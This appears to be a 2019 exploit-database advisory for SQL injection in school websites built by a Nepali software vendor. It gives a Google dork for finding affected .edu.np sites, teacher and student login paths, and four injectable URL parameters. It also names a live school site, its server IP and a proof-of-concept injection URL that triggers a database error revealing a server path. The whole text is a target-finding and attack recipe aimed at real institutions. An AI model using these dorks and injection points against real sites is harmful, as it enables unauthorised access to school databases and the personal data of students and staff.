Iceberg Technology Software Nepal SQL Injection

1. #########################################################
2.  
3. # Exploit Title : Iceberg Technology Software Nepal SQL Injection Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 08/01/2019
7. # Vendor Homepage : icebergtechnepal.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : inurl:''Developed by:Iceberg Technology'' site:edu.np
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14. CXSecurity Exploit Reference Link :
15. cxsecurity.com/issue/WLB-2019010052
16.  
17. #########################################################
18.  
19. # Admin/Teacher/Student Panel Login Path :
20. **************************************
21.  
22. /teacher/index.php
23. /student/index.php
24.  
25. # SQL Injection Exploit :
26. *********************
27.  
28. /news.php?id=[SQL Injection]
29.  
30. /photo.php?edit=[SQL Injection]
31.  
32. /about.php?Title=[SQL Injection]
33.  
34. /admission.php?Title=[SQL Injection]
35.  
36. #########################################################
37.  
38. # Example Vulnerable Site =>
39. **************************
40.  
41. Note => (192.185.142.207) => There are 57 domains hosted on this server.
42.  
43. [+] basiclearning.edu.np/news.php?id=42%27 =>
44.  
45. [ Proof of Concept ] => archive.fo/5ILQG
46.  
47. #########################################################
48.  
49. # SQL Database Error :
50. ********************
51.  
52. Warning: mysql_fetch_array() expects parameter 1 to be
53. resource, boolean given in /home/basiclea/public_html/news.php on line 24
54.  
55. #########################################################
56.  
57. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
58.  
59. #########################################################